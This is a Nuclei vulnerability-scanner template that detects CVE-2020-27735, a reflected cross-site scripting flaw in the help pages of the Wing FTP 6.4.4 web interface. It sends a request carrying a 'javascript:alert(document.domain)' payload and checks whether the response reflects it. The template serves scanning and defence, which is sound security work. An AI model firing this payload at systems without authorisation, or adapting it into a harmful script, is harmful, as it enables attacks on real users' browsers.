nuclei-templates/cves/2020/CVE-2020-27735.yaml

37 lines
1.0 KiB
YAML

id: CVE-2020-27735
info:
name: Wing FTP's Web Interface XSS
author: pikpikcu
severity: medium
description: |
An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
tags: cve,cve2020,xss,wing-ftp
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-27735
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
words:
- '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html